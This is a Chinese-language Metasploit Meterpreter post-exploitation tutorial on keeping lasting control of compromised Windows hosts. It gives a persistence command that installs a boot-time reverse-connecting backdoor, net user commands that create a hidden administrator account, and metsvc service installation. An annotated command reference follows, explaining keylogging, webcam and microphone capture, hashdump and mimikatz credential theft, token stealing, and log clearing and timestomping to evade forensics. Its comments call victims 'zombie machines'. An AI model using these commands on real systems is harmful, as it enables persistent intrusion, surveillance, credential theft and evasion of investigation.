反弹shell,获得一个会话后进行持续控制目标主机,就不需要每次进行攻击来取得 meterpreter
1.使用persistence模块
使用persistence模块可在目标计算机上安装一个永久性后门,即使有一天目标计算机修补了漏洞,我们仍然可以通过这个连接来实现对目标计算机的控制。
常用参数:
-X 开机自启动
-i
-p 反向连接端口号
-r 反向连接IP地址
persistence的详细帮助
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching exploit/multi/handler to connect to the agent
-L <opt> Location in target host to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on which the system running Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back如run persistence -X -i 11 -p 6220 -r 192.168.1.104 然后用use exploit/multi/handler模块设置后进行监听
2.目标主机创建隐藏用户
获取目标主机的远程命令行shell
如果出错,可能是目标主机限制了cmd.exe的访问权,可以使用migrate注入到管理员用户进程中再试一试。
在cmd下输入以下
# 创建用户($符号,可以起到隐藏创建用户的目的)
net user test$ 123456 /add
# 将创建的用户添加到管理员组
net localgroup administrators test$ /add3.通过metsvc服务的方式
运行run metsvc将会在目标主机上以Meterpreter的服务的形式注册在服务列表中,并开机自动自动。运行run metsvc -r卸载目标主机上的Meterpreter服务。
meterpreter的help信息
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session # 将当前会话放在后台运行(之后可用sessions -i xxid来交互)
bgkill Kills a background meterpreter script # 杀死一个后台meterpreter脚本
bglist Lists running background scripts # 后台列表
bgrun Executes a meterpreter script as a background thread # 作为一个后台线程运行脚本
channel Displays information or control active channels
close Closes a channel # 关闭通道
disable_unicode_encoding Disables encoding of unicode strings # 禁用unicode编码
enable_unicode_encoding Enables encoding of unicode strings # 启用unicode编码
exit Terminate the meterpreter session # 结束meterpreter会话,等同于quit
get_timeouts Get the current session timeout values # 获取当前会话的timeout值
guid Get the session GUID
help Help menu
info Displays information about a Post module # 查看post模块的信息
irb Drop into irb scripting mode # 进入 Ruby 脚本模式
load Load one or more meterpreter extensions # 加载插件,比如直接load mimikatz读取肉鸡的密码明文,而不需要通过hashdump然后解密
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process # 进程迁徙, 用于进程注入,配合PS命令,注入到一个具有system权限的进程,从而由超管账户administrator提权到system权限
pivot Manage pivot listeners
quit Terminate the meterpreter session # 结束、终止、退出meterpreter会话,等同于exit
read Reads data from a channel
resource Run the commands stored in a file # 执行存储在文件中的命令
run Executes a meterpreter script or Post module # 执行meterpreter脚本或者post模块
sessions Quickly switch to another session # 会话
set_timeouts Set the current session timeout values # 设置当前会话的timeout值
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load" # 加载meterpreter扩展,是load的别名,不过已被弃用
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands #文件系统命令
# 在meterpreter命令下输入的linux文件命令默认针对目标肉鸡,比如pwd、getwd、ps、cat等,除非特殊说明(比如添加l字符,lpwd、getlwd)才是针对kali本机
============================
Command Description
------- -----------
cat Read the contents of a file to the screen # 显示肉鸡上的文件内容,如cat c:\\111.txt
cd Change directory # 该表工作目录
checksum Retrieve the checksum of a file # 获取文件的校验和
cp Copy source to destination # 复制文件到目的地
dir List files (alias for ls)
download Download a file or directory # 下载肉鸡上的文件到当前kali机器,如download c:\\1111.txt /root
edit Edit a file # 用vim编辑肉鸡上的文件,如edit c:\\xxx.txt
getlwd Print local working directory # 获取本地kali的当前工作目录(local work directory),等同于lpwd命令
getwd Print working directory # 获取被控肉鸡的工作目录,等同于pwd命令
lcd Change local working directory # 切换kali本机的工作目录
lpwd Print local working directory # 输出本地kali的当前工作目录(lockl print work directory),等同于getlwd
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory # 输出被控肉鸡的工作目录,等同于pwd命令
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory # 上传本地文件、目录到远程肉鸡
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces # 查看ip
ipconfig Display interfaces # 查看ip
netstat Display the network connections # 显示网络连接
portfwd Forward a local port to a remote service # 端口转发:比如被控肉鸡处在内网,使用该命令直接转发端口使用3389,而不需要在额外上传端口转发工具nc、lcx等
resolve Resolve a set of host names on the target
route View and modify the routing table # 查看或修改受害者路由表
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log # 清除受害者计算机上的事件日志(日志记录)
drop_token Relinquishes any active impersonation token. # 丢弃令牌,放弃(停止)假冒当前令牌。
execute Execute a command # 执行命令、文件,如execute -f cmd.exe -i 表示执行cmd.exe命令并进行交互。
getenv Get one or more environment variable values
getpid Get the current process identifier # 查看在被控肉鸡上的当前进程号(pid),即:反弹脚本的进程pid
getprivs Attempt to enable all privileges available to the current process # 获取尽可能多的特权
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as # 查看被控肉鸡的权限,等同于whoami
kill Terminate a process # 杀死/结束进程,如kill 123,杀死pid为123的进程(配合ps命令查看进程id)
localtime Displays the target system's local date and time # 目标肉鸡系统的当地时间
pgrep Filter processes by name # processes grep,通过名字过滤(检索)进程
pkill Terminate processes by name # 通过名字来结束进程
ps List running processes # 进程列表
reboot Reboots the remote computer # 重启目标肉鸡
reg Modify and interact with the remote registry # 与目标主机注册表进行交互,创建,删除,查询等操作。
rev2self Calls RevertToSelf() on the remote machine # 在受害者机器上调用RevertToSelf(),回到控制目标主机的初始用户账户下。
shell Drop into a system command shell # 进入目标肉鸡上的系统命令shell,比如windows上的cmd,linux上的bash
shutdown Shuts down the remote computer # 关机
steal_token Attempts to steal an impersonation token from the target process # 从system权限的目标进程盗窃令牌,进行令牌假冒,从而提权到system权限,类似migrate。
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS # 查看远程肉鸡的系统信息,比如计算机名、操作系统、体系结构、语言、域名、登录的用户数、运行在肉鸡上的反弹脚本类型
Stdapi: User interface Commands # 用户接口命令
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations # 列出所有课访问的desktop
getdesktop Get the current meterpreter desktop # 获取当前的 meterpreter 桌面
idletime Returns the number of seconds the remote user has been idle # idle time,目标肉鸡已经空闲的时间
keyscan_dump Dump the keystroke buffer # 导出击键记录缓存(键盘记录)
keyscan_start Start capturing keystrokes # 开始捕获键盘记录(击键记录)
keyscan_stop Stop capturing keystrokes # 停止键盘记录
screenshot Grab a screenshot of the interactive desktop # 截屏(目标肉鸡),文件会自动保存在kali本机
setdesktop Change the meterpreters current desktop # 切换到另一个用户界面(该功能基于那些用户已登录)。
uictl Control some of the user interface components # 控制/接管 目标主机的键盘和鼠标。
Stdapi: Webcam Commands # 网络摄像头命令,(补充:如果需要实时观看目标肉鸡屏幕,可通过run vnc来开启)
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands # 提权命令
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system. # 尝试将权限提升为system权限
Priv: Password database Commands # 密码、数据库命令
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database # 导出哈希密码 (SAM) 文件中的值(密文形式),还需要进一步解密;"run hashdump"和"run smart_hashdump"两个脚本更加隐秘
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes # 操纵、修改、访问文件的MACE属性,例如修改文件的创建时间(反取证调查)。